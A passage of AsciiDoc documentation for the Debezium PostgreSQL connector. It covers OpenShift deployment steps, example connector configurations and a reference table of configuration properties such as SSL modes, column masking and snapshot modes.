cluster.\n<2> `spec.image` specifies the name of the image that you created to run your {prodname} connector. This property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. Apply your `KafkaConnect` CR to the OpenShift Kafka instance by running the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThis updates your Kafka Connect environment in OpenShift to add a Kafka Connector instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. Create a `KafkaConnector` custom resource that configures your {prodname} PostgreSQL connector instance.\n+\nYou configure a {prodname} PostgreSQL connector in a `.yaml` file that sets connector configuration properties. A connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed. See the {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[complete list of PostgreSQL connector properties] that can be specified in these configurations.\n+\nThe following example configures a {prodname} connector that connects to a PostgreSQL server host, `192.168.99.100`, on port `5432`. This host has a database named `sampledb`, a schema named `public`, and `fulfillment` is the server's logical name.\n+\n.`fulfillment-connector.yaml`\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectorApiVersion}\n kind: KafkaConnector\n metadata:\n name: fulfillment-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.postgresql.PostgresConnector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: 192.168.99.100 \/\/ <4>\n database.port: 5432\n database.user: debezium\n database.password: dbz\n database.dbname: sampledb\n database.server.name: fulfillment \/\/ <5>\n schema.include.list: public \/\/ <6>\n plugin.name: pgoutput \/\/ <7>\n----\n<1> The name of the connector.\n<2> Only one task should operate at any one time.\nBecause the PostgreSQL connector reads the PostgreSQL server\u2019s `binlog`,\nusing a single connector task ensures proper order and event handling.\nThe Kafka Connect service uses connectors to start one or more tasks that do the work,\nand it automatically distributes the running tasks across the cluster of Kafka Connect services.\nIf any of the services stop or crash,\nthose tasks will be redistributed to running services.\n<3> The connector\u2019s configuration.\n<4> The name of the database host that is running the PostgreSQL server. In this example, the database host name is `192.168.99.100`.\n<5> A unique server name.\nThe server name is the logical identifier for the PostgreSQL server or cluster of servers.\nThis name is used as the prefix for all Kafka topics that receive change event records.\n<6> The connector captures changes in only the `public` schema. It is possible to configure the connector to capture changes in only the tables that you choose. See {link-prefix}:{link-postgresql-connector}#postgresql-property-table-include-list[`table.include.list` connector configuration property].\n<7> The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server. While the only supported value for PostgreSQL 10 and later is `pgoutput`, you must explicitly set `plugin.name` to `pgoutput`.\n\n. Create your connector instance with Kafka Connect. For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f fulfillment-connector.yaml\n----\n+\nThis registers `fulfillment-connector` and the connector starts to run against the `sampledb` database as defined in the `KafkaConnector` CR.\n\n. Verify that the connector was created and has started:\n.. Display the Kafka Connect log output to verify that the connector was created and has started to capture changes in the specified database:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/cluster=my-connect-cluster)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like this:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n+\nIf the connector starts correctly without errors, it creates a topic for each table whose changes the connector is capturing. For the example CR, there would be a topic for each table in the `public` schema. Downstream applications can subscribe to these topics.\n\n.. Verify that the connector created the topics by running the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc get kafkatopics\n----\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[performs a consistent snapshot] of the PostgreSQL server databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\nendif::product[]\n\nifdef::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID:debezium-postgresql-connector-configuration-example\n\/\/ Title: {prodname} PostgreSQL connector configuration example\n[[postgresql-example-configuration]]\n=== Connector configuration example\n\nFollowing is an example of the configuration for a PostgreSQL connector that connects to a PostgreSQL server on port 5432 at 192.168.99.100, whose logical name is `fulfillment`. Typically, you configure the {prodname} PostgreSQL connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"fulfillment-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.postgresql.PostgresConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"5432\", \/\/ <4>\n \"database.user\": \"postgres\", \/\/ <5>\n \"database.password\": \"postgres\", \/\/ <6>\n \"database.dbname\" : \"postgres\", \/\/ <7>\n \"database.server.name\": \"fulfillment\", \/\/ <8>\n \"table.include.list\": \"public.inventory\" \/\/ <9>\n\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this PostgreSQL connector class.\n<3> The address of the PostgreSQL server.\n<4> The port number of the PostgreSQL server.\n<5> The name of the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].\n<6> The password for the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].\n<7> The name of the PostgreSQL database to connect to\n<8> The logical name of the PostgreSQL server\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<9> A list of all tables hosted by this server that this connector will monitor. This is optional, and there are other properties for listing the schemas and tables to include or exclude from monitoring.\n\nSee the {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[complete list of PostgreSQL connector properties] that can be specified in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts the connector task that connects to the PostgreSQL database and streams change event records to Kafka topics.\n\n[[postgresql-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a PostgreSQL connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The {link-prefix}:{link-postgresql-connector}#postgresql-server-configuration[PostgreSQL server] is configured to support logical replication.\n\n* The {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] is installed.\n\n* The PostgreSQL connector is installed.\n\n.Procedure\n\n. Create a configuration for the PostgreSQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-postgresql-connector-configuration-properties\n\/\/ Title: Description of {prodname} PostgreSQL connector configuration properties\n[[postgresql-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} PostgreSQL connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:postgresql-required-configuration-properties[Required configuration properties]\n* xref:postgresql-advanced-configuration-properties[Advanced configuration properties]\n* xref:postgresql-pass-through-properties[Pass-through configuration properties]\n\n[id=\"postgresql-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[postgresql-property-name]]<<postgresql-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[postgresql-property-connector-class]]<<postgresql-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.postgresql.PostgresConnector` for the PostgreSQL connector.\n\n|[[postgresql-property-tasks-max]]<<postgresql-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The PostgreSQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[postgresql-property-plugin-name]]<<postgresql-property-plugin-name, `+plugin.name+`>>\n|`decoderbufs`\n|The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server.\n\nifdef::community[]\nSupported values are `decoderbufs`, `wal2json`, `+wal2json_rds+`, `+wal2json_streaming+`, `+wal2json_rds_streaming+` and `pgoutput`.\n\nIf you are using a `wal2json` plug-in and transactions are very large, the JSON batch event that contains all transaction changes might not fit into the hard-coded memory buffer, which has a size of 1 GB. In such cases, switch to a streaming plug-in, by setting the `plugin-name` property to `wal2json_streaming` or `wal2json_rds_streaming`. With a streaming plug-in, PostgreSQL sends the connector a separate message for each change in a transaction.\n\nendif::community[]\nifdef::product[]\nThe only supported value is `pgoutput`. You must explicitly set `plugin.name` to `pgoutput`.\nendif::product[]\n\n|[[postgresql-property-slot-name]]<<postgresql-property-slot-name, `+slot.name+`>>\n|`debezium`\n|The name of the PostgreSQL logical decoding slot that was created for streaming changes from a particular plug-in for a particular database\/schema. The server uses this slot to stream events to the {prodname} connector that you are configuring.\n\nSlot names must conform to link:https:\/\/www.postgresql.org\/docs\/current\/static\/warm-standby.html#STREAMING-REPLICATION-SLOTS-MANIPULATION[PostgreSQL replication slot naming rules], which state: _\"Each replication slot has a name, which can contain lower-case letters, numbers, and the underscore character.\"_\n\n|[[postgresql-property-slot-drop-on-stop]]<<postgresql-property-slot-drop-on-stop, `+slot.drop.on.stop+`>>\n|`false`\n|Whether or not to delete the logical replication slot when the connector stops in a graceful, expected way. The default behavior is that the replication slot remains configured for the connector when the connector stops. When the connector restarts, having the same replication slot enables the connector to start processing where it left off.\n\nSet to `true` in only testing or development environments. Dropping the slot allows the database to discard WAL segments. When the connector restarts it performs a new snapshot or it can continue from a persistent offset in the Kafka Connect offsets topic.\n\n|[[postgresql-property-publication-name]]<<postgresql-property-publication-name, `+publication.name+`>>\n|`dbz_publication`\n|The name of the PostgreSQL publication created for streaming changes when using `pgoutput`.\n\nThis publication is created at start-up if it does not already exist and it includes _all tables_.\n{prodname} then applies its own include\/exclude list filtering, if configured, to limit the publication to change events for the specific tables of interest.\nThe connector user must have superuser permissions to create this publication,\nso it is usually preferable to create the publication before starting the connector for the first time.\n\nIf the publication already exists, either for all tables or configured with a subset of tables, {prodname} uses the publication as it is defined.\n\n|[[postgresql-property-database-hostname]]<<postgresql-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the PostgreSQL database server.\n\n|[[postgresql-property-database-port]]<<postgresql-property-database-port, `+database.port+`>>\n|`5432`\n|Integer port number of the PostgreSQL database server.\n\n|[[postgresql-property-database-user]]<<postgresql-property-database-user, `+database.user+`>>\n|\n|Name of the PostgreSQL database user for connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-password]]<<postgresql-property-database-password, `+database.password+`>>\n|\n|Password to use when connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-dbname]]<<postgresql-property-database-dbname, `+database.dbname+`>>\n|\n|The name of the PostgreSQL database from which to stream the changes.\n\n|[[postgresql-property-database-server-name]]<<postgresql-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular PostgreSQL database server or cluster in which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[postgresql-property-schema-include-list]]<<postgresql-property-schema-include-list, `+schema.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes. Any schema name not included in `schema.include.list` is excluded from having its changes captured. By default, all non-system schemas have their changes captured. Do not also set the `schema.exclude.list` property.\n\n|[[postgresql-property-schema-exclude-list]]<<postgresql-property-schema-exclude-list, `+schema.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes. Any schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. Do not also set the `schema.include.list` property.\n\n|[[postgresql-property-table-include-list]]<<postgresql-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.\n\n|[[postgresql-property-table-exclude-list]]<<postgresql-property-table-exclude-list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has it changes captured. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[postgresql-property-column-include-list]]<<postgresql-property-column-include-list, `+column.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.exclude.list` property.\n\n|[[postgresql-property-column-exclude-list]]<<postgresql-property-column-exclude-list, `+column.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.include.list` property.\n\n|[[postgresql-property-time-precision-mode]]<<postgresql-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n|Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`adaptive_time_microseconds` captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. An exception is `TIME` type fields, which are always captured as microseconds. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-postgresql-connector}#postgresql-temporal-values[temporal values].\n\n|[[postgresql-property-decimal-handling-mode]]<<postgresql-property-decimal-handling-mode, `+decimal.handling.mode+`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` represents values by using `java.math.BigDecimal` to represent values in binary form in change events. +\n +\n`double` represents values by using `double` values, which might result in a loss of precision but which is easier to use. +\n +\n`string` encodes values as formatted strings, which are easy to consume but semantic information about the real type is lost. See {link-prefix}:{link-postgresql-connector}#postgresql-decimal-types[Decimal types].\n\n|[[postgresql-property-hstore-handling-mode]]<<postgresql-property-hstore-handling-mode, `+hstore.handling.mode+`>>\n|`map`\n| Specifies how the connector should handle values for `hstore` columns: +\n +\n`map` represents values by using `MAP`. +\n +\n`json` represents values by using `json string`. This setting encodes values as formatted strings such as `{\"key\" : \"val\"}`. See {link-prefix}:{link-postgresql-connector}#postgresql-hstore-type[PostgreSQL `HSTORE` type].\n\n|[[postgresql-property-interval-handling-mode]]<<postgresql-property-interval-handling-mode, `+interval.handling.mode+`>>\n|`numeric`\n| Specifies how the connector should handle values for `interval` columns: +\n +\n`numeric` represents intervals using approximate number of microseconds. +\n +\n`string` represents intervals exactly by using the string pattern representation `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`. For example: `P1Y2M3DT4H5M6.78S`. See {link-prefix}:{link-postgresql-connector}#postgresql-basic-types[PostgreSQL basic types].\n\n|[[postgresql-property-database-sslmode]]<<postgresql-property-database-sslmode, `+database.sslmode+`>>\n|`disable`\n|Whether to use an encrypted connection to the PostgreSQL server. Options include: +\n +\n`disable` uses an unencrypted connection. +\n +\n`require` uses a secure (encrypted) connection, and fails if one cannot be established. +\n +\n`verify-ca` behaves like `require` but also verifies the server TLS certificate against the configured Certificate Authority (CA) certificates, or fails if no valid matching CA certificates are found. +\n +\n`verify-full` behaves like `verify-ca` but also verifies that the server certificate matches the host to which the connector is trying to connect. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslcert]]<<postgresql-property-database-sslcert, `+database.sslcert+`>>\n|\n|The path to the file that contains the SSL certificate for the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslkey]]<<postgresql-property-database-sslkey, `+database.sslkey+`>>\n|\n|The path to the file that contains the SSL private key of the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslpassword]]<<postgresql-property-database-sslpassword, `+database.sslpassword+`>>\n|\n|The password to access the client private key from the file specified by `database.sslkey`. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslrootcert]]<<postgresql-property-database-sslrootcert, `+database.sslrootcert+`>>\n|\n|The path to the file that contains the root certificate(s) against which the server is validated. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-tcpkeepalive]]<<postgresql-property-database-tcpkeepalive, `+database.tcpKeepAlive+`>>\n|`true`\n|Enable TCP keep-alive probe to verify that the database connection is still alive. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-tombstones-on-delete]]<<postgresql-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[postgresql-property-column-truncate-to-length-chars]]<<postgresql-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `+column.truncate.to.20.chars`.\n\n|[[postgresql-property-column-mask-with-length-chars]]<<postgresql-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.\n\n|[[postgresql-property-column-mask-hash]]<<postgresql-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified columns are replaced with pseudonyms. +\n +\nA pseudonym consists of the hashed value that results from applying the specifed _hashAlgorithm_ and _salt_. Based on the hash function that is used, referential integrity is kept while column values are replaced with pseudonyms. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. +\n +\nIf necessary, the pseudonym is automatically shortened to the length of the column. You can specify multiple properties with different hash algorithms and salts in a single configuration. In the following example, `CzQMA0cB5K` is a randomly selected salt. +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =inventory.orders.customerName,inventory.shipment.customerName` +\n +\nDepending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting masked data set might not be completely masked.\n\n|[[postgresql-property-column-propagate-source-type]]<<postgresql-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[postgresql-property-datatype-propagate-source-type]]<<postgresql-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee the {link-prefix}:{link-postgresql-connector}#postgresql-data-types[list of PostgreSQL-specific data type names].\n\n|[[postgresql-property-message-key-columns]]<<postgresql-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|[[postgresql-publication-autocreate-mode]]<<postgresql-publication-autocreate-mode, `+publication.autocreate.mode+`>>\n|_all_tables_\n|Applies only when streaming changes by using link:https:\/\/www.postgresql.org\/docs\/current\/sql-createpublication.html[the `pgoutput` plug-in]. The setting determines how creation of a link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-publication.html[publication] should work. Possible settings are: +\n +\n`all_tables` - If a publication exists, the connector uses it. If a publication does not exist, the connector creates a publication for all tables in the database for which the connector is capturing changes. This requires that the database user that has permission to perform replications also has permission to create a publication. This is granted with `CREATE PUBLICATION <publication_name> FOR ALL TABLES;`. +\n +\n`disabled` - The connector does not attempt to create a publication. A database administrator or the user configured to perform replications must have created the publication before running the connector. If the connector cannot find the publication, the connector throws an exception and stops. +\n +\n`filtered` - If a publication exists, the connector uses it. If no publication exists, the connector creates a new publication for tables that match the current filter configuration as specified by the `database.exclude.list`, `schema.include.list`, `schema.exclude.list`, and `table.include.list` connector configuration properties. For example: `CREATE PUBLICATION <publication_name> FOR TABLE <tbl1, tbl2, tbl3>`.\n\n|[[postgresql-property-binary-handling-mode]]<<postgresql-property-binary-handling-mode, `+binary.handling.mode+`>>\n|bytes\n|Specifies how binary (`bytea`) columns should be represented in change events: +\n +\n`bytes` represents binary data as byte array. +\n +\n`base64` represents binary data as base64-encoded strings. +\n +\n`hex` represents binary data as hex-encoded (base16) strings.\n\n|[[postgresql-property-truncate-handling-mode]]<<postgresql-property-truncate-handling-mode, `+truncate.handling.mode+`>>\n|bytes\n|Specifies how whether `TRUNCATE` events should be propagated or not (only available when using the `pgoutput` plug-in with Postgres 11 or later): +\n +\n`skip` causes those event to be omitted (the default). +\n +\n`include` causes hos events to be included. +\n+\nPlease see xref:postgresql-truncate-events[] for the structure of _truncate_ events and their ordering semantics.\n\n|===\n\n[id=\"postgresql-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,28%a,42%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[postgresql-property-snapshot-mode]]<<postgresql-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - The connector performs a snapshot only when no offsets have been recorded for the logical server name. +\n +\n`always` - The connector performs a snapshot each time the connector starts. +\n +\n`never` - The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL. +\n +\n`initial_only` - The connector performs an initial snapshot and then stops, without processing any subsequent changes. +\n +\n`exported` - The connector performs a snapshot based on the point in time when the replication slot was created. This is an excellent way to perform the snapshot in a lock-free way. +\n +\nifdef::community[]\n`custom` - The connector performs a snapshot according to the setting for the `snapshot.custom.class` property, which is a custom implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. +\nendif::community[]\n +\nThe{link-prefix}:{link-postgresql-connector}#snapshot-mode-settings[reference table for snapshot mode settings] has more details.\n\nifdef::community[]\n|[[postgresql-property-snapshot-custom-class]]<<postgresql-property-snapshot-custom-class, `+snapshot.custom.class+`>>\n|\n| A full Java class name that is an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Required when the `snapshot.mode` property is set to `custom`. See {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].\nendif::community[]\n|[[postgresql-property-snapshot-include-collection-list]]<<postgresql-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All tables specified in `table.include.list`\n|An optional, comma-separated list of regular expressions that match names of schemas specified in `table.include.list` for which you *want* to take the snapshot when the `snapshot.mode` is not `never`\n|[[postgresql-property-snapshot-lock-timeout-ms]]<<postgresql-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[How the connector performs snapshots] provides details.\n\n|[[postgresql-property-snapshot-select-statement-overrides]]<<postgresql-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that are generated by the logical decoding plug-in. Specify a comma-separated list of fully-qualified table names in the form _databaseName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._DB_NAME_._TABLE_NAME_`, for example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[postgresql-property-event-processing-failure-handling-mode]]<<postgresql-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events: +\n +\n`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +\n +\n`warn` logs the offset of the problematic event, skips that event, and continues processing. +\n +\n`skip` skips the problematic event and continues processing.\n\n|[[postgresql-property-max-queue-size]]<<postgresql-property-max-queue-size, `+max.queue.size+`>>\n|`20240`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events received from streaming replication in the blocking queue before writing them to Kafka. This queue can provide backpressure when, for example, writing records to Kafka is slower that it should be or Kafka is not available.\n\n|[[postgresql-property-max-batch-size]]<<postgresql-property-max-batch-size, `+max.batch.size+`>>\n|`10240`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[postgresql-property-max-queue-size-in-bytes]]<<postgresql-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. The feature is disabled by default, it will be active if it's set with a positive long value.\n\n|[[postgresql-property-poll-interval-ms]]<<postgresql-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[postgresql-property-include-unknown-datatypes]]<<postgresql-property-include-unknown-datatypes, `+include.unknown.datatypes+`>>\n|`false`\n|Specifies connector behavior when the connector encounters a field whose data type is unknown. The default behavior is that the connector omits the field from the change event and logs a warning. +\n +\nSet this property to `true` if you want the change event to contain an opaque binary representation of the field. This lets consumers decode the field. You can control the exact representation by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[`binary handling mode`] property.\n\nNOTE: Consumers risk backward compatibility issues when `include.unknown.datatypes` is set to `true`. Not only may the database-specific binary representation change between releases, but if the data type is eventually supported by {prodname}, the data type will be sent downstream in a logical type, which would require adjustments by consumers. In general, when encountering unsupported data types, create a feature request so that support can be added.\n\n|[[postgresql-property-database-initial-statements]]<<postgresql-property-database-initial-statements, `+database.initial.statements+`>>\n|\n|A semicolon separated list of SQL statements that the connector executes when it establishes a JDBC connection to the database. To use a semicolon as a character and not as a delimiter, specify two consecutive semicolons, `;;`. +\n +\nThe connector may establish JDBC connections at its own discretion. Consequently, this property is useful for configuration of session parameters only, and not for executing DML statements. +\n +\nThe connector does not execute these statements when it creates a connection for reading the transaction log. +\n\n|[[postgresql-property-heartbeat-interval-ms]]<<postgresql-property-heartbeat-interval-ms, 